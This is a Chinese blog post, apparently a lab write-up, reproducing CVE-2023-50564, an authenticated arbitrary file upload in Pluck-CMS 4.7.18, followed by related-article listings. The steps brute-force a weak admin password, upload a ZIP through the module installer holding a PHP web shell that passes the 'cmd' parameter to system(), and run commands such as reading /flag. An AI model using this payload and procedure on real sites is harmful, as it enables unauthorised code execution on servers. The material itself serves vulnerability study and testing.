Pluck-CMS任意文件上传漏洞(CVE-2023-50564)

最新推荐文章于 2024-08-28 22:19:39 发布
最新推荐文章于 2024-08-28 22:19:39 发布
阅读量354 收藏
点赞数 1
分类专栏: # 文件上传 # 命令执行 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140635016
版权

一、漏洞概述

Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。

二、影响范围

Pluck-CMS v4.7.18

三、访问页面

四、漏洞复现

1、点击admin,爆破登录密码,最终为admin123

2、登录后台,找到managemodules,点击installmodule

3、漏洞点installmodule,一个文件上传功能。

4、构造payload,制作phpinfo.php,并压缩为phpinfo.zip。

<?php phpinfo();system($_GET[cmd]);?>

5、上传phpinfo.zip

6、上传成功,自动跳转到phpinfo页面,拉到最下面可以看到上传后的文件路径。

/var/www/html/data/modules/phpinfo/phpinfo.php

7、执行RCE命令

/data/modules/phpinfo/phpinfo.php?cmd=cat%20/flag

风中追风-fzzf
关注
专栏目录
Pluck 代码问题漏洞( CVE-2022-26965)
千寻的博客
12-01 1972
Pluck-CMS-Pluck-4.7.16 后台RCE
【春秋云境】CVE-2023-50564 Pluck-CMS v4.7.18 后台文件上传漏洞一把梭
HMX404的博客
04-03 837
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
finecms-含有前台文件上传漏洞源码包.zip
01-04
finecms-含有前台文件上传漏洞源码包,亲测真实有效、可用!如有侵权,请联系CSDN管理员删除
【春秋云镜】CVE-2023-50564
最新发布
2301_79200709的博客
08-28 231
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。根据介绍,需要上传一个恶意文件,首先找到上传点,登录admin之后,可以通过弱口令爆破得到密码是admin123。上传文件的位置在options-manage moudles-install a moudle。那就直接传一个一句话木马(打包成zip文件)成功,那就可以查看flag了。进入目录后测试能否执行命令。传进去后得到文件文职。
超级CMS2.39-文件上传漏洞
LYJ20010728的博客
06-21 711
超级CMS2.39-文件上传漏洞环境搭建漏洞复现上传点一上传点二上传点三漏洞分析 环境搭建 下载超级CMS V2.39,下载地址 使用phpstudy搭建web环境 把下载好的源码放到网站根目录下,开启phpstudy,浏览器访问安装后即可 漏洞复现 上传点一 上传点二 上传点三 漏洞分析 存在漏洞的位置file.class.php文件中的getFileExtName方法 public function getFileExtName($filename){ $filename
web安全-文件上传漏洞-某CMSCVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1887
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
文件上传漏洞-解析漏洞CMS漏洞、编辑器漏洞CVE漏洞
硫酸超的博客
08-12 573
演示案例 CVE-2017-12615-上传-Tomcat 中间件解析漏洞+配合文件上传测试 IIS-上传-解析-(panfei806) 修改filepath的值为/1 路径就会变成 /12001001.jpg 那么如果将filepath的值改为 /1.php; 那么路径就会变成/1.php;12001001.jpg被当做php文件执行 效果: Apache-上传-解析-vulhub Nginx-上传-解析-vulhub ...
[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE
b1n的博客
08-23 497
Pluck-CMS-Pluck-4.7.16 后台RCE。
CMS程序pluck 4.6.3-pluck-codepub.zip
03-09
[CMS程序]pluck 4.6.3_pluck-codepub.zip试卷可打印可复制可编辑
Go-pluck-以快速和直观的方式采集文本
08-14
《Go-pluck:快速直观的文本采集工具》 在信息技术高速发展的今天,数据采集成为一项重要的任务,尤其在大数据分析、研究以及网络监控等领域。Go-pluck是一款基于Go语言开发的文本采集工具,它以其高效、简洁的特性...
Pluck CMS 中文版
03-26
Pluck是一个非常简单易用的PHP平台CMS(内容管理系统)。通过Pluck,即使不了解网络编程语言也可以建立自己的站点。 Pluck致力于让每个人都可以容易地管理自己的站点。对于所有的小型站点来说,Pluck是个不错的选择。Pluck发布于GPL协议下,是一个完全开源的平台。 cnPluck是一个致力于在中文领域推广PluckCMS的站点 使用PluckCMS建立您的站点需要PHP5+运行环境,以及不小于5MB的站点空间(安装PluckCMS大约需要占用3MB空间)。 您不需要SQL数据库,PluckCMS使用半静态的.php文件存储数据
Pluck CMS 4.6.3 繁体中文版.zip
05-25
Pluck是一个非常简单易用的PHP平台CMS(内容管理系统)。通过Pluck,即使不了解网络编程语言也可以建立自己的站点。 Pluck致力于让每个人都可以容易地管理自己的站点。对于所有的小型站点来说,Pluck是个不错的选择。Pluck发布于GPL协议下,是一个完全开源的平台。 使用Pluck CMS建立您的站点需要PHP5.2.0 运行环境,以及不小于5MB的站点空间(安装Pluck CMS大约需要占用3MB空间)。 您不需要SQL数据库,Pluck CMS使用半静态的.php文件存储数据。 Pluck CMS 4.6.3 繁体中文版本拥有完全的繁体中文安装和操作界面,并附有cnPluck主题。
pluck PHP多国语言简洁CMS系统 v4.7.4.rar
07-10
pluck PHP多国语言简洁CMS系统来自国外的PHP开源达人编写,系统小巧,可实现在页面里插入照片,在blog里写文章,用album-option分享照片,通过页面上的email表单和访客保持联系,更改站点信息等功能。   本次更新版本:pluck v4.7.4
cnPluck CMS v4.6.3 简体中文版.gz
07-09
Pluck是一个非常简单易用的PHP平台CMS(内容管理系统)。通过Pluck,即使不了解网络编程语言也可以建立自己的站点。   Pluck致力于让每个人都可以容易地管理自己的站点。对于所有的小型站点来说,Pluck是个不错的选择。Pluck发布于GPL协议下,是一个完全开源的平台。   cnPluck是一个致力于在中文领域推广Pluck CMS的站点   使用Pluck CMS建立您的站点需要PHP5 运行环境,以及不小于5MB的站点空间(安装Pluck CMS大约需要占用3MB空间)。   您不需要SQL数据库,Pluck CMS使用半静态的.php文件存储数据
春秋云镜 CVE-2023-50564
qq274575499的博客
04-28 712
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
文件上传漏洞
heiseweiye的博客
09-24 1178
1.1文件上传漏洞概述 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,有时候几乎没有什么技术门槛(以上内容摘自白帽子讲web安全) 1.2过滤(格式限制) 通常我们所上传的文件格式是被限制的,而要上传一个PHP文件,可以利用验证扩展名的方式存在的问题进行绕过,另外是结合PHP和系统的特性,导致了可以截断文件名来绕...
WEB漏洞攻防 - 文件上传漏洞 - CMS类应用场景 - [见文章头]任意文件上传漏洞
易编橙 · 终身成长社群,相遇已是上上签!
09-03 930
思考:在实际应用场景中,常规类的文件上传CMS类的文件上传、编辑器的上传或者CTF比赛中的文件上传应用场景都有不同的差异;总结下来就是,文件上传不管是发现还是利用上都会根据产生层面而不同,常规类无资料的情况下采用常规思路测试,有资料的情况下直接参考资料进行即可。
CVE-2022-26965
08-29
CVE-2022-26965是一个后台远程命令执行漏洞,影响Pluck-CMS-Pluck-4.7.16版本。通过利用该漏洞,攻击者可以在受影响的Pluck CMS后台执行任意命令。[2]建议及时升级到最新安全版本或参考官方网站提供的修复方案,以避免遭受攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [春秋云境:CVE-2022-26965](https://blog.csdn.net/laobanjiull/article/details/128106473)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [CVE-2022-26965](https://blog.csdn.net/longlangci/article/details/131269806)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值